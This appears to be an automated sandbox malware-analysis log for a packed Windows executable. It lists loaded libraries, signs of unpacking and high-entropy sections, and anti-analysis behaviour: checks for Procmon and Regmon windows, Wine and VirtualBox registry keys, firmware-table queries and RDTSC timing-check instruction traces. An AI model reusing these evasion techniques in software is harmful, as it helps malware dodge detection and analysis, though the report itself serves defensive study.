Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: OtHVIQ2ge4.exe

Static file information: File size 2976256 > 1048576

Source: OtHVIQ2ge4.exe

Static PE information: Raw size of hmbcuswq is bigger than: 0x100000 < 0x2aea00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe

Unpacked PE file: 0.2.OtHVIQ2ge4.exe.570000.0.unpack :EW;.rsrc :W;.idata :W;hmbcuswq:EW;jagdmkfn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;hmbcuswq:EW;jagdmkfn:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: OtHVIQ2ge4.exe

Static PE information: real checksum: 0x2d7e1c should be: 0x2dee5c

Source: OtHVIQ2ge4.exe	Static PE information: section name:
Source: OtHVIQ2ge4.exe	Static PE information: section name: .rsrc
Source: OtHVIQ2ge4.exe	Static PE information: section name: .idata
Source: OtHVIQ2ge4.exe	Static PE information: section name: hmbcuswq
Source: OtHVIQ2ge4.exe	Static PE information: section name: jagdmkfn
Source: OtHVIQ2ge4.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_0175C17F push 38E08617h; ret	0_3_0175C1B3
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_0175C17F push 38E08617h; ret	0_3_0175C1B3
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_017594CA push esp; ret	0_3_017594E1
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_017594CA push esp; ret	0_3_017594E1
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_0175C1B5 push 38E08617h; ret	0_3_0175C1B3
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_0175C1B5 push 38E08617h; ret	0_3_0175C1B3
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_017594B2 push ecx; ret	0_3_017594C9
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_017594B2 push ecx; ret	0_3_017594C9
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_01759692 push ss; ret	0_3_017596F1
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_01759692 push ss; ret	0_3_017596F1
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_0175961A push cs; ret	0_3_01759631
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_0175961A push cs; ret	0_3_01759631
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_0175928A pushfd ; ret	0_3_017592A1
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_0175928A pushfd ; ret	0_3_017592A1
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_016ECB68 push 68016ECBh; retf	0_3_016ECB6D
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_016ED0DC pushad ; retf	0_3_016ED0DD
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_016ECB54 push eax; retf	0_3_016ECB55
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_016ECB50 push eax; retf	0_3_016ECB51
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_016ECD9E pushad ; retf	0_3_016ECE19
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_0170BC67 push cs; iretd	0_3_0170BC68
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_01711DD4 pushad ; ret	0_3_01711DD9
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_0171290C push esp; retf	0_3_01712911
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_0175C17F push 38E08617h; ret	0_3_0175C1B3
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_0175C17F push 38E08617h; ret	0_3_0175C1B3
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_017594CA push esp; ret	0_3_017594E1
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_017594CA push esp; ret	0_3_017594E1
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_0175C1B5 push 38E08617h; ret	0_3_0175C1B3
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_0175C1B5 push 38E08617h; ret	0_3_0175C1B3
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_017594B2 push ecx; ret	0_3_017594C9
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_017594B2 push ecx; ret	0_3_017594C9
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Code function: 0_3_01759692 push ss; ret	0_3_017596F1

Source: OtHVIQ2ge4.exe

Static PE information: section name: entropy: 7.983564281596194

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5C7F11 second address: 5C7F17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5C7F17 second address: 5C7F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 74C206 second address: 74C230 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF628B69586h 0x00000008 jnp 00007FF628B69586h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF628B69598h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 74C50C second address: 74C517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF628D73F56h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 74C517 second address: 74C527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FF628B69586h 0x0000000a js 00007FF628B69586h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 74C527 second address: 74C52B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 74C52B second address: 74C53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF628B69586h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 74C53E second address: 74C557 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FF628D73F56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF628D73F5Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 74C683 second address: 74C68E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF628B69586h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 74C93F second address: 74C948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 5C7EF7 second address: 5C7F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF628B69593h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 75037F second address: 75038C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 75038C second address: 750391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 750391 second address: 750397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 750397 second address: 7503A8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7503A8 second address: 7503DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ecx 0x0000000a jmp 00007FF628D73F69h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF628D73F5Ah 0x0000001b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7503DC second address: 5C7F11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a sub dword ptr [ebp+122D1EEAh], ecx 0x00000010 push dword ptr [ebp+122D14DDh] 0x00000016 jmp 00007FF628B6958Dh 0x0000001b jmp 00007FF628B69597h 0x00000020 call dword ptr [ebp+122D1F1Fh] 0x00000026 pushad 0x00000027 mov dword ptr [ebp+122D1CE9h], ebx 0x0000002d xor eax, eax 0x0000002f pushad 0x00000030 mov di, B370h 0x00000034 or dword ptr [ebp+122D20C9h], ebx 0x0000003a popad 0x0000003b mov edx, dword ptr [esp+28h] 0x0000003f pushad 0x00000040 mov ah, 48h 0x00000042 mov esi, dword ptr [ebp+122D2CD1h] 0x00000048 popad 0x00000049 mov dword ptr [ebp+122D2DB9h], eax 0x0000004f stc 0x00000050 stc 0x00000051 mov esi, 0000003Ch 0x00000056 jmp 00007FF628B69594h 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f stc 0x00000060 cld 0x00000061 lodsw 0x00000063 add dword ptr [ebp+122D1CE9h], ecx 0x00000069 jmp 00007FF628B6958Ah 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 jns 00007FF628B69592h 0x00000078 mov ebx, dword ptr [esp+24h] 0x0000007c stc 0x0000007d mov dword ptr [ebp+122D1CE9h], ebx 0x00000083 nop 0x00000084 je 00007FF628B69592h 0x0000008a jnp 00007FF628B6958Ch 0x00000090 push eax 0x00000091 push eax 0x00000092 push edx 0x00000093 jmp 00007FF628B69593h 0x00000098 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 750498 second address: 7504D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 1B92B0B8h 0x00000010 mov edi, dword ptr [ebp+122D20DBh] 0x00000016 push 00000003h 0x00000018 stc 0x00000019 push 00000000h 0x0000001b add si, 6E35h 0x00000020 push 00000003h 0x00000022 and ch, 00000002h 0x00000025 call 00007FF628D73F59h 0x0000002a push esi 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7504D9 second address: 7504DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7504DD second address: 7504E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7504E1 second address: 7504F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FF628B69586h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7504F2 second address: 7504FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7504FC second address: 750500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 750500 second address: 750535 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF628D73F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007FF628D73F5Bh 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF628D73F67h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 750535 second address: 75053B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 750739 second address: 75073E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 75073E second address: 750795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 jmp 00007FF628B6958Fh 0x0000000e pop esi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007FF628B69596h 0x00000018 mov eax, dword ptr [eax] 0x0000001a jl 00007FF628B69592h 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 pushad 0x00000025 jc 00007FF628B69588h 0x0000002b pushad 0x0000002c popad 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 750830 second address: 75086C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF628D73F65h 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF628D73F5Bh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 75086C second address: 750901 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69590h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF628B69598h 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 je 00007FF628B69599h 0x00000019 jno 00007FF628B69593h 0x0000001f mov eax, dword ptr [eax] 0x00000021 jnc 00007FF628B6959Bh 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b jg 00007FF628B6958Eh 0x00000031 pop eax 0x00000032 cmc 0x00000033 lea ebx, dword ptr [ebp+1245C2D4h] 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jne 00007FF628B69591h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 736B46 second address: 736B56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FF628D73F56h 0x0000000a jnp 00007FF628D73F56h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 76F53F second address: 76F544 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 76F544 second address: 76F54A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 76F815 second address: 76F81B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 76F81B second address: 76F82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jng 00007FF628D73F82h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 76F82C second address: 76F832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 76F832 second address: 76F836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 76F836 second address: 76F84E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B69594h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
